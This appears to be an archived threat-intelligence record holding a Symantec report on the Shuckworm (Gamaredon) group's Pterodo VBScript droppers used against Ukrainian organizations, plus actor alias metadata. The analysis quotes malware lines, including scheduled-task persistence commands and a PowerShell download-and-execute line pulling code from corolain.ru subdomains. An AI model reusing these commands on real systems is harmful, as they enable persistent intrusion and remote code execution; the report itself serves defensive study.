{ "id": "b459124c-ab39-428b-b6d1-b5f94d86d156", "created_at": "2026-04-06T00:13:39.089892Z", "updated_at": "2026-04-10T03:37:04.202959Z", "deleted_at": null, "sha1_hash": "c444be7de57a435a484792660cd28278d7723fd3", "title": "Shuckworm: Espionage Group Continues Intense Campaign Against Ukraine", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 44551, "plain_text": "Shuckworm: Espionage Group Continues Intense Campaign\r\nAgainst Ukraine\r\nBy About the Author\r\nArchived: 2026-04-05 16:59:22 UTC\r\nThe Russian-linked Shuckworm espionage group (aka Gamaredon, Armageddon) is continuing to mount an\r\nintense cyber campaign against organizations in Ukraine.\r\nShuckworm has almost exclusively focused its operations on Ukraine since it first appeared in 2014. These attacks\r\nhave continued unabated since the Russian invasion of the country. While the group’s tools and tactics are simple\r\nand sometimes crude, the frequency and persistence of its attacks mean that it remains one of the key cyber threats\r\nfacing organizations in the region.\r\nMultiple payloads\r\nOne of the hallmarks of the group’s recent activity is the deployment of multiple malware payloads on targeted\r\ncomputers. These payloads are usually different variants of the same malware (Backdoor.Pterodo), designed to\r\nperform similar tasks. Each will communicate with a different command-and-control (C\u0026C) server.\r\nThe most likely reason for using multiple variants is that it may provide a rudimentary way of maintaining\r\npersistence on an infected computer. If one payload or C\u0026C server is detected and blocked, the attackers can fall\r\nback on one of the others and roll out more new variants to compensate.\r\nSymantec’s Threat Hunter Team, part of Broadcom Software, has found four distinct variants of Pterodo being\r\nused in recent attacks. All of them are Visual Basic Script (VBS) droppers with similar functionality. They will\r\ndrop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code\r\nfrom a C\u0026C server. All of the embedded VBScripts were very similar to one another and used similar obfuscation\r\ntechniques.\r\nBackdoor.Pterodo.B\r\nThis variant is a modified self-extracting archive, containing obfuscated VBScripts in resources that can be\r\nunpacked by 7-Zip.\r\nIt then adds them as a scheduled task to ensure persistence:\r\nCreateObject(\"Shell.Application\").ShellExecute \"SCHTASKS\", \"/CREATE /sc minute /mo 10 /tn \" +\r\n\"\"\"UDPSync\"\" /tr \"\"wscript.exe \"\"\" + hailJPT + \"\"\"\" \u0026 \" jewels  //b  joking //e VBScript joyful \"\" /F \", \"\" ,\r\n\"\" , 0\r\nCreateObject(\"Shell.Application\").ShellExecute \"SCHTASKS\", \"/CREATE /sc minute /mo 10 /tn \" +\r\n\"\"\"SyncPlayer\"\" /tr \"\"wscript.exe \"\"\" + enormouslyAKeIXNE + \"\"\"\" + \" jewels  //b  joking //e VBScript\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine\r\nPage 1 of 3\n\njoyful \"\" /F \", \"\" , \"\" , 0\r\nThe script also copies itself to [USERPROFILE]\\ntusers.ini file.\r\nThe two newly created files are more obfuscated VBScripts.\r\nThe first is designed to gather system information, such as the serial number of the C: drive, and sends this\r\ninformation to a C\u0026C server.\r\nThe second adds another layer of persistence by copying the previously dropped ntusers.ini file to\r\nanother desktop.ini file.\r\nBackdoor.Pterodo.C\r\nThis variant is also designed to drop VBScripts on the infected computer. When run, it will first engage in API\r\nhammering, making multiple meaningless API calls, which is presumably an attempt to avoid sandbox detection.\r\nIt will then unpack a script and a file called offspring.gif to C:\\Users\\[username]\\. It will call the script with:\r\n\"wscript \"[USERNAME]\\lubszfpsqcrblebyb.tbi\" //e:VBScript /w /ylq /ib /bxk  //b /pgs\"\r\nThis script runs ipconfig /flushdns and executes the offspring.gif file. Offsprint.gif will download a PowerShell\r\nscript from a random subdomain of corolain.ru and execute it:\r\ncvjABuNZjtPirKYVchnpGVop = \"$tmp = $(New-Object net.webclient).DownloadString('http://'+\r\n[System.Net.DNS]::GetHostAddresses([string]$(Get-Random)+'.corolain.ru') +'/get.php'); Invoke-Expression $tmp\"\r\nBackdoor.Pterodo.D\r\nThis variant is another VBScript dropper. It will create two files:\r\n[USERPROFILE]\\atwuzxsjiobk.ql\r\n[USERPROFILE]\\abide.wav\r\nIt executes them with the following command:\r\nwscript \"[USERPROFILE]\\atwuzxsjiobk.ql\" //e:VBScript /tfj /vy /g /cjr /rxia  //b /pyvc\r\nSimilar to the other variants, the first script will run ipconfig /flushdns before calling the second script and\r\nremoving the original executable.\r\nThe second script has two layers of obfuscation, but in the end it downloads the final payload from the domain\r\ndeclined.delivered.maizuko[.]ru and executes it.\r\nBackdoor.Pterodo.E\r\nThe final variant is functionally very similar to variants B and C, engaging in API hammering before extracting\r\ntwo VBScript files to the user’s home directory. Script obfuscation is very similar to other variants.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine\r\nPage 2 of 3\n\nOther tools\r\nWhile the attackers have made heavy use of Pterodo during recent weeks, other tools have also been deployed\r\nalongside it. These include UltraVNC, an open-source remote-administration/remote-desktop-software utility.\r\nUltraVNC has previously been used by Shuckworm in multiple attacks.\r\nIn addition to this, Shuckworm has also been observed using Process Explorer, a Microsoft Sysinternals tool\r\ndesigned to provide information about which handles and DLL processes have opened or loaded.\r\nPersistent threat\r\nWhile Shuckworm is not the most tactically sophisticated espionage group, it compensates for this in its focus and\r\npersistence in relentlessly targeting Ukrainian organizations. It appears that Pterodo is being continuously\r\nredeveloped by the attackers in a bid to stay ahead of detection.\r\nWhile Shuckworm appears to be largely focused on intelligence gathering, its attacks could also potentially be a\r\nprecursor to more serious intrusions, if the access it acquires to Ukrainian organizations is turned over to other\r\nRussian-sponsored actors.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nA full list of IOCs is available here on GitHub.\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine\r\nPage 3 of 3", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine" ], "report_names": [ "shuckworm-intense-campaign-ukraine" ], "threat_actors": [ { "id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308", "created_at": "2022-10-25T15:50:23.320841Z", "updated_at": "2026-04-10T02:00:05.356444Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Gamaredon Group", "IRON TILDEN", "Primitive Bear", "ACTINIUM", "Armageddon", "Shuckworm", "DEV-0157", "Aqua Blizzard" ], "source_name": "MITRE:Gamaredon Group", "tools": [ "QuietSieve", "Pteranodon", "Remcos", "PowerPunch" ], "source_id": "MITRE", "reports": null }, { "id": "d5156b55-5d7d-4fb2-836f-861d2e868147", "created_at": "2023-01-06T13:46:38.557326Z", "updated_at": "2026-04-10T02:00:03.023048Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "ACTINIUM", "DEV-0157", "Blue Otso", "G0047", "IRON TILDEN", "PRIMITIVE BEAR", "Shuckworm", "UAC-0010", "BlueAlpha", "Trident Ursa", "Winterflounder", "Aqua Blizzard", "Actinium" ], "source_name": "MISPGALAXY:Gamaredon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61940e18-8f90-4ecc-bc06-416c54bc60f9", "created_at": "2022-10-25T16:07:23.659529Z", "updated_at": "2026-04-10T02:00:04.703976Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Actinium", "Aqua Blizzard", "Armageddon", "Blue Otso", "BlueAlpha", "Callisto", "DEV-0157", "G0047", "Iron Tilden", "Operation STEADY#URSA", "Primitive Bear", "SectorC08", "Shuckworm", "Trident Ursa", "UAC-0010", "UNC530", "Winterflounder" ], "source_name": "ETDA:Gamaredon Group", "tools": [ "Aversome infector", "BoneSpy", "DessertDown", "DilongTrash", "DinoTrain", "EvilGnome", "FRAUDROP", "Gamaredon", "GammaDrop", "GammaLoad", "GammaSteel", "Gussdoor", "ObfuBerry", "ObfuMerry", "PlainGnome", "PowerPunch", "Pteranodon", "Pterodo", "QuietSieve", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "Resetter", "RuRAT", "SUBTLE-PAWS", "Socmer", "UltraVNC" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434419, "ts_updated_at": 1775792224, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c444be7de57a435a484792660cd28278d7723fd3.pdf", "text": "https://archive.orkl.eu/c444be7de57a435a484792660cd28278d7723fd3.txt", "img": "https://archive.orkl.eu/c444be7de57a435a484792660cd28278d7723fd3.jpg" } }